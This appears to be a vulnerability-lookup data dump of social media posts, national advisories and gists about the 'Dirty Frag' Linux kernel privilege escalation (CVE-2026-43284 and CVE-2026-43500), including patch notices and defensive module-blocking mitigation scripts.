"CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww5tzpy22", "content": "4/11\n\nhave already\n  been compromised. Make sure possibly affected programs do not have any\n  open sessions first:\n    sh -c \"echo 3 > /proc/sys/vm/drop_caches\"\n  For more information, see:\n    https://github.com/V4bel/dirtyfrag\n    https://www.cve.org/CVERecord?id=CVE-2026-43284", "creation_timestamp": "2026-05-09T00:01:48.830091Z"}, {"uuid": "34581625-a9bd-403d-8dd8-2f5d647dcae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwdh2f62i", "content": "9/11\n\n(CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n  Also remove the modules from the kernel if they have been loaded:\n    rmmod esp4 esp6 rxrpc\n  And, drop the file caches in case in-memory program copies have already\n  been compromised. Make sure possibly affected programs do not", "creation_timestamp": "2026-05-09T00:01:54.361469Z"}, {"uuid": "92a8107b-b955-45cd-ab66-451b20b3495f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwemek424", "content": "10/11\n\nhave any\n  open sessions first:\n    sh -c \"echo 3 > /proc/sys/vm/drop_caches\"\n  For more information, see:\n    https://github.com/V4bel/dirtyfrag\n    https://www.cve.org/CVERecord?id=CVE-2026-43284\n  (* Security fix *)\ntesting/packages/linux-7.0.x/kernel-headers-7.0.5-x86-1.txz:", "creation_timestamp": "2026-05-09T00:01:55.639105Z"}, {"uuid": "efa8fd38-d386-4734-9f16-eef7d25b159f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mleyipgro32d", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available.\n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500).  \n\nAll users should update their systems immediately to stay protected. \ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:30:04.913513Z"}, {"uuid": "31829aba-7c93-4b37-beef-07a28ab8d8f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116542111365493280", "content": "Our CTI team identified a lot of activities targeting Linux Kernel (CVE-2026-43284) https://vuldb.com/vuln/362045/cti", "creation_timestamp": "2026-05-09T01:51:37.165231Z"}, {"uuid": "b406b3aa-163d-4183-aea5-93f6fc9889ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlf77ax52d2i", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 202 interactions\nCVE-2026-0073: 79 interactions\nCVE-2026-41940: 66 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0073: 66 interactions\nCVE-2026-43284: 61 interactions\nCVE-2026-7270: 32 interactions\n", "creation_timestamp": "2026-05-09T02:30:08.930788Z"}, {"uuid": "ac18eb8b-d0d3-45d8-bad8-7a97dd0bf3af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/adhisimon.kodesumber.com.ap.brid.gy/post/3mlfklfop3ar2", "content": "Habis #CopyFail terbitlah #DirtyFrag\n\n  * CVE-2026-43284\n  * CVE-2026-43500\n\n\n\nBelum coba sih _poc_ -nya, tapi sepertinya simpel juga.\n\nhttps://github.com/V4bel/dirtyfrag/blob/master/README.md\n\n#linux #cve #infosec", "creation_timestamp": "2026-05-09T05:53:43.228987Z"}, {"uuid": "dc798bb8-5f4b-466a-aba2-f2d23812e41d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/devops-daily.com/post/3mlfocj5dyv2s", "content": "\ud83d\udcdd Dirty Frag (CVE-2026-43284 + CVE-2026-43500): Local Root on Every Major Linux Distro\n\nA two-bug chain in the Linux kernel networking subsystems lets any unprivileged local user become root in a single command. The PoC is public, the...\n\nRead here: https://devops-daily.com/posts/dirty-frag-cve-...", "creation_timestamp": "2026-05-09T07:00:19.066594Z"}, {"uuid": "0d919f10-75bc-4835-a41f-dae65065138e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-dirty-frag-new-linux-local-privilege-escalation-vulnerability-was-disclosed", "content": "", "creation_timestamp": "2026-05-08T09:28:10.000000Z"}, {"uuid": "3a6839fe-f3dc-4632-9590-6c1bfe7080ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3mleevhyme22p", "content": "\"Dirty Frag\" Linux Kernel LPE Zero-Day (CVE-2026-43284, CVE-2026-43500) #patchmanagement", "creation_timestamp": "2026-05-08T18:39:18.209123Z"}, {"uuid": "dc0b9f68-ad47-495b-b7b6-8e020d2c409a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://mastodon.social/ap/users/115426718704364579/statuses/116540356170458190", "content": "\ud83d\udcf0 Critical Unpatched 'Dirty Frag' Linux Zero-Day Allows Instant Root Access\n\ud83d\udea8 CRITICAL ZERO-DAY: 'Dirty Frag' (CVE-2026-43284) vulnerability in Linux kernel disclosed with NO PATCH. Allows immediate root privilege escalation. Flaw has existed for 9 years. Admins must seek mitigations now! \ud83d\udc27\ud83d\udd25 #Linux #ZeroDay #CyberSecurity\n\ud83d\udd17 https://cyber.netsecops.io", "creation_timestamp": "2026-05-08T18:25:16.716299Z"}, {"uuid": "ed0ba886-f832-42e6-af1a-4d467e89af18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/netsecio.bsky.social/post/3mlee4yqpyw2b", "content": "\ud83d\udea8 CRITICAL ZERO-DAY: 'Dirty Frag' (CVE-2026-43284) vulnerability in Linux kernel disclosed with NO PATCH. Allows immediate root privilege escalation. Flaw has existed for 9 years. Admins must seek mitigations now! \ud83d\udc27\ud83d\udd25 #Linux #ZeroDay #CyberSecurity", "creation_timestamp": "2026-05-08T18:25:37.755295Z"}, {"uuid": "e268db2e-4a69-40d1-9444-4b9373f9f147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116540434561235145", "content": "#DirtyFrag status/advisories:\nAlmaLinux:https://almalinux.org/blog/2026-05-07-dirty-frag/\nDebian:https://security-tracker.debian.org/tracker/CVE-2026-43500https://security-tracker.debian.org/tracker/CVE-2026-43284\nGentoo:https://bugs.gentoo.org/974307\nRedHat:https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2026-43284https://access.redhat.com/security/cve/cve-2026-43284nothing yet on CVE-2026-43500\nRocky:https://kb.ciq.com/article/rocky-linux/rl-dirty-frag-mitigation\nSUSE / OpenSUSE:https://www.suse.com/security/cve/CVE-2026-43500.htmlhttps://www.suse.com/security/cve/CVE-2026-43284.htmlhttps://www.suse.com/c/addressing-copy-fail2-aka-dirtyfrag-in-suse-virtualization/\nUbuntu:https://ubuntu.com/security/CVE-2026-43284https://ubuntu.com/security/CVE-2026-43500https://ubuntu.com/blog/dirty-frag-linux-vulnerability-fixes-available\nAWS:https://aws.amazon.com/security/security-bulletins/rss/2026-027-aws/ https://explore.alas.aws.amazon.com/CVE-2026-43284.html", "creation_timestamp": "2026-05-08T18:45:22.306700Z"}, {"uuid": "50b13d0c-857d-48d1-b335-89de7c91cf9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mlefaalbezb2", "content": "#DirtyFrag status/advisories:\n\nAlmaLinux:\nhttps://almalinux.org/blog/2026-05-07-dirty-frag/\n\nDebian:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284\n\nGentoo:\nhttps://bugs.gentoo.org/974307\n\nRedHat [\u2026]", "creation_timestamp": "2026-05-08T18:46:05.473406Z"}, {"uuid": "d04c16b7-d955-4772-906a-b8072ee8de3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/Senci/6dd521104fd36bf9c679975fb9e8b89c", "content": "#!/usr/bin/env bash\n# Dirty Frag mitigation + verification\n# CVE-2026-43284 (xfrm-ESP) / CVE-2026-43500 (RxRPC)\n# Works on Rocky/RHEL and Arch \u2014 idempotent, no reboot required.\n\nset -euo pipefail\n\nCONF=/etc/modprobe.d/dirtyfrag.conf\nMODS=(esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || {\n  echo \"must run as root\" >&2\n  exit 1\n}\n\necho \"=== Dirty Frag mitigation ===\"\necho \"host:   $(hostname)\"\necho \"kernel: $(uname -r)\"\necho\n\n# 1. report whether vulnerable .ko files are present on this kernel\necho \"[1/5] vulnerable modules on disk:\"\nfor m in \"${MODS[@]}\"; do\n  f=$(find \"/lib/modules/$(uname -r)\" -name \"${m}.ko*\" 2>/dev/null | head -1)\n  [[ -n $f ]] && echo \"  - $m: $f\" || echo \"  - $m: not built for this kernel\"\ndone\necho\n\n# 2. write blacklist\necho \"[2/5] writing $CONF\"\ncat >\"$CONF\" <<'EOF'\n# Dirty Frag mitigation \u2014 block xfrm-ESP and RxRPC page-cache-write LPE\n# CVE-2026-43284 (esp4/esp6), CVE-2026-43500 (rxrpc)\n# Remove this file once distro kernel ships backports.\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\nchmod 0644 \"$CONF\"\n\n# 3. unload anything currently loaded\necho \"[3/5] unloading currently loaded modules:\"\nfor m in \"${MODS[@]}\"; do\n  if lsmod | awk '{print $1}' | grep -qx \"$m\"; then\n    if rmmod \"$m\" 2>/dev/null; then\n      echo \"  - $m: unloaded\"\n    else\n      echo \"  - $m: in use, could not unload (reboot to clear)\"\n    fi\n  else\n    echo \"  - $m: not loaded\"\n  fi\ndone\n\n# 4. flush page cache (cleans up if exploit had been run pre-mitigation)\necho \"[4/5] flushing page cache\"\nsync\necho 3 >/proc/sys/vm/drop_caches\necho \"  - done\"\n\n# 5. verify autoload is blocked (dry-run, does not execute /bin/false)\necho\necho \"[5/5] verifying autoload is blocked:\"\nfail=0\nfor m in \"${MODS[@]}\"; do\n  if modprobe -n -v \"$m\" 2>&1 | grep -q '/bin/false'; then\n    echo \"  - $m: BLOCKED \u2713\"\n  else\n    echo \"  - $m: NOT BLOCKED \u2717\"\n    fail=1\n  fi\ndone\n\necho\nif [[ $fail -eq 0 ]]; then\n  echo \"=== mitigation applied successfully \u2014 no reboot required ===\"\n  exit 0\nelse\n  echo \"=== mitigation FAILED \u2014 investigate $CONF and modprobe config ===\"\n  exit 2\nfi\n", "creation_timestamp": "2026-05-08T19:04:16.000000Z"}, {"uuid": "7542769b-5143-439f-a251-7a9076cb40d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/nicolas17.xyz/post/3mleijak4qk24", "content": "Did you update your Linux kernel *again* to protect against the last privilege escalation bug?\n\nNo, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).", "creation_timestamp": "2026-05-08T19:44:03.706718Z"}, {"uuid": "ca48ffc8-b4b7-44f6-9b63-8c3674f9fa60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mleiuxfnowo2", "content": "AL26-011 - Vulnerabilities affecting Linux - CVE-2026-43284 and CVE-2026-43500 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MW...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-08T19:50:39.247258Z"}, {"uuid": "a971ec9e-3148-46c6-8708-ba38e8c00cb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83400", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 18:44:58\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 + CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T19:00:04.000000Z"}, {"uuid": "1d98b8fb-8738-4fd8-88b5-2c56095fb415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ze-benedito.capivarinha.club.ap.brid.gy/post/3mlejhxe4zog2", "content": "Debian soltou a corre\u00e7\u00e3o do dirty frag no trixie-security \ud83c\udf89\n\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284", "creation_timestamp": "2026-05-08T20:01:20.421813Z"}, {"uuid": "69d60f58-fa02-4988-b817-a45b676ac494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mlekajztdm2e", "content": "~Cybergcca~\nAlert on unpatched Linux LPE flaws (Dirty Frag) with active PoCs, plus Edge & cPanel updates.\n-\nIOCs: CVE-2026-43284, CVE-2026-43500\n-\n#Linux #ThreatIntel #Vulnerability", "creation_timestamp": "2026-05-08T20:14:58.568562Z"}, {"uuid": "9dab4d5d-0d33-43f6-9e3f-7c0713a21029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/Larvitz.burningboard.net.ap.brid.gy/post/3mlel6wnhxjs2", "content": "CVE-2026-43284 / \"Dirty Frag\" .. Antoher one of those nasty local-privilege-escallations.\n\nQuickfix for Centos/Fedora based systems:\n\nprintf 'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n' > /etc/modprobe.d/dirtyfrag.conf && rmmod esp4 esp6 rxrpc 2>/dev/null; true [\u2026]", "creation_timestamp": "2026-05-08T20:32:03.637706Z"}, {"uuid": "dbeb41ed-e378-455c-aef4-e7667e1727be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mlfqadh76s2h", "content": "Excellent article en fran\u00e7ais sur la faille  Dirty Frag  aka la double CVE-2026-43284 et CVE-2026-43500 !\nJe vous recommande grandement sa lecture !\n\nblog.marcfredericgomez.fr/dirty-frag-c...\n\n#Linux #LPE #DirtyFrag", "creation_timestamp": "2026-05-09T07:34:52.092485Z"}, {"uuid": "a0837575-cf46-4223-94b2-a5c4025d1da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83481", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a suominen\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 07:51:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nTracking CVE-2026-43284\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T08:00:05.000000Z"}, {"uuid": "8765cb6d-5603-4c00-b7b5-f66d128f896b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mlfxag26os2y", "content": "Dirty Frag (CVE-2026-43284 et CVE-2026-43500) blog.marcfredericgomez.fr/dirty-frag-c...", "creation_timestamp": "2026-05-09T09:40:12.935027Z"}, {"uuid": "3ac82b7f-fdba-4421-b6e3-3793f54765ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-rilevata-poc-per-l-elevazione-di-privilegi-in-linux-cve-2026-43284", "content": "Disponibile un Proof of Concept (PoC) per lo sfruttamento della vulnerabilit\u00e0 denominata Dirty Frag, identificata tramite la CVE-2026-43284, presente nel Kernel Linux. La vulnerabilit\u00e0 interessa i moduli esp4 ed esp6 del sottosistema IPsec, utilizzato per la cifratura del traffico di rete e delle VPN, e il modulo rxrpc, utilizzato dal protocollo di rete AFS. La vulnerabilit\u00e0, qualora sfruttata, potrebbe consentire a un utente non privilegiato, l\u2019ottenimento di privilegi di root sul sistema.", "creation_timestamp": "2026-05-08T09:21:59.000000Z"}, {"uuid": "53dfbd6d-91aa-476e-a5d2-b2d6177aeb17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mldt3l233k2c", "content": "CVE\u30ca\u30f3\u30d0\u30fc\u3064\u3044\u305f\u306d\u3002\n\n\"Dirty Frag Linux kernel local privilege escalation vulnerability (CVE-2026-43284) mitigations are now available. \"\n\nDirty Frag Linux kernel local privilege escalation vulnerability mitigations | Ubuntu \nubuntu.com/blog/dirty-f...", "creation_timestamp": "2026-05-08T13:20:40.993112Z"}, {"uuid": "541409d8-213f-4cee-a315-3d307834d851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/kisai.me/post/3mldtc4wrns2a", "content": "\u898b\u3064\u3051\u305f\n\nCVE-2026-43284\nCVE-2026-43500\n\n\u3053\u308c\u304b\u306a", "creation_timestamp": "2026-05-08T13:24:15.656254Z"}, {"uuid": "10b2699b-00e6-4dba-bcd4-1e97e600d4f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/drgoon.bsky.social/post/3mldtdraztc2n", "content": "\"CVE-2026-43284 is now assigned.\n\nThat was for the first issue, and that is now fixed in the latest round of stable kernel updates.  The second has CVE-2026-43500 reserved for it if you need to track this, and is not fixed in any released kernel version yet.\"", "creation_timestamp": "2026-05-08T13:25:11.122609Z"}, {"uuid": "32642579-8baf-4015-b07f-ec5ee5ab6151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/bykvaadm/7bb8937ebc4f0485fea26fa27af4c522", "content": "- name: Mitigate DirtyFrag (CVE-2026-43284 / CVE-2026-43500)\n    hosts: all\n    become: true\n    tasks:\n      - name: Caveats\n        debug:\n          msg: |\n            \u0412\u041d\u0418\u041c\u0410\u041d\u0418\u0415:\n            - esp4/esp6: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f IPsec VPN (strongSwan, Libreswan \u0438 \u0434\u0440.) \u2014\n              \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0441\u043b\u043e\u043c\u0430\u0435\u0442 \u0442\u0443\u043d\u043d\u0435\u043b\u0438. \u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0436\u0434\u0430\u0442\u044c \u043f\u0430\u0442\u0447\u0430 \u044f\u0434\u0440\u0430.\n            - rxrpc: \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f AFS/Kerberos, \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\n              \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c.\n            - CVE-2026-43500 (rxrpc) \u043f\u043e\u043a\u0430 \u043d\u0435 \u0437\u0430\u043f\u0430\u0442\u0447\u0435\u043d \u2014 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 \u043c\u043e\u0434\u0443\u043b\u044f\n              \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0437\u0430\u0449\u0438\u0442\u0430 \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0430\u0442\u0447\u0430 \u044f\u0434\u0440\u0430.\n            - \u041f\u043e\u0441\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 DirtyFrag page cache \u0437\u0430\u0441\u043e\u0440\u0451\u043d \u2014 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f\n              drop cache \u0438\u043b\u0438 \u0440\u0435\u0431\u0443\u0442.\n\n      - name: Blacklist vulnerable modules\n        copy:\n          dest: /etc/modprobe.d/dirtyfrag-mitigation.conf\n          content: |\n            install esp4 /bin/false\n            install esp6 /bin/false\n            install rxrpc /bin/false\n            blacklist esp4\n            blacklist esp6\n            blacklist rxrpc\n\n      - name: Unload modules if loaded\n        modprobe:\n          name: \"{{ item }}\"\n          state: absent\n        loop: [esp4, esp6, rxrpc]\n        failed_when: false\n        when: ansible_facts.get('ansible_virtualization_type') != 'container'\n\n      - name: Verify modules not loaded\n        shell: lsmod | grep -E '^(esp4|esp6|rxrpc)\\s'\n        register: check\n        failed_when: check.rc == 0\n        changed_when: false\n        when: ansible_facts.get('ansible_virtualization_type') != 'container'", "creation_timestamp": "2026-05-08T13:41:26.000000Z"}, {"uuid": "4bdc4fc5-1c5d-402e-8b41-4209c1a8aa94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mlene27n652h", "content": "\u4f55\u304c\u8d77\u304d\u308b\u304b\u3002\n\n\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u3044\u308b\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u3001\u7ba1\u7406\u8005\u6a29\u9650\u3092\u596a\u3048\u308b\u3002\u30bf\u30a4\u30df\u30f3\u30b0\u306e\u904b\u3082\u8981\u3089\u306a\u3044\u2014\u2014\u78ba\u5b9f\u306b\u52d5\u304f\u3002\n\n\u901a\u4fe1\u6697\u53f7\u51e6\u7406\u306e\u5185\u90e8\u3067\u3001\u4ed6\u4eba\u306e\u30e1\u30e2\u30ea\u9818\u57df\u306b\u76f4\u63a5\u66f8\u304d\u8fbc\u3093\u3067\u3057\u307e\u3046\u69cb\u9020\u4e0a\u306e\u6b20\u9665\u30022017\u5e74\u306e\u30b3\u30fc\u30c9\u5909\u66f4\u304b\u30899\u5e74\u9593\u3001\u6c17\u3065\u304b\u308c\u306a\u3044\u307e\u307e\u6b8b\u3063\u3066\u3044\u305f\u3002\ud83d\udd4a\ufe0f\n\nCVE-2026-43284 \u306f\u4fee\u6b63\u6e08\u307f\u3002CVE-2026-43500 \u306f\u4fee\u6b63\u306a\u3057\u3002\n\nDirty Pipe \u2192 Copy Fail \u2192 Dirty Frag\u3002\u540c\u3058\u7a2e\u985e\u306e\u7a74\u304c\u4e16\u4ee3\u3092\u8d8a\u3048\u3066\u62e1\u304c\u3063\u3066\u3044\u308b\u3002\u4e00\u3064\u585e\u3044\u3067\u3082\u3001\u540c\u3058\u4ed5\u7d44\u307f\u3067\u7d44\u307e\u308c\u305f\u5225\u306e\u7d4c\u8def\u304b\u3089\u6765\u308b\u3002", "creation_timestamp": "2026-05-08T21:10:37.006915Z"}, {"uuid": "d556c705-9298-4479-90dd-1b1b8424a437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mlenmpi3zb2z", "content": "DirtyFrag exploits two Linux kernel bugs, CVE-2026-43284 and CVE-2026-43500, enabling local root access on major distros including Ubuntu, RHEL, Fedora, CentOS Stream, AlmaLinux, and openSUSE. #LinuxRoot #KernelExploit #USA", "creation_timestamp": "2026-05-08T21:15:28.625073Z"}, {"uuid": "f85163d3-4a64-4107-bff6-c03e725d9acf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/m3nu/d85533bbf342edd3a9426711409a1b9a", "content": "", "creation_timestamp": "2026-05-08T13:45:53.000000Z"}, {"uuid": "0b255b26-f5ad-4b7f-b932-017beb6d3fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/sayem314/dd8d3932a2e91d6a8a454b9986f6087e", "content": "Dirty Frag is a Linux kernel local privilege escalation chain involving the IPsec ESP stack and RxRPC. If a vulnerable host runs untrusted local code, containers, CI jobs, app sandboxes, or shared shell users, treat it as urgent.\n\nThe real fix is a patched kernel from your distribution. Until Debian or Ubuntu ship fixed kernels for your release, the mitigation below blocks the affected modules:\n\n- `esp4`\n- `esp6`\n- `rxrpc`\n\nSources:\n\n- https://github.com/V4bel/dirtyfrag\n- https://dirtyfrag.io/\n- https://openwall.com/lists/oss-security/2026/05/07/10\n\n## What this disables\n\nThis mitigation disables kernel IPsec ESP and 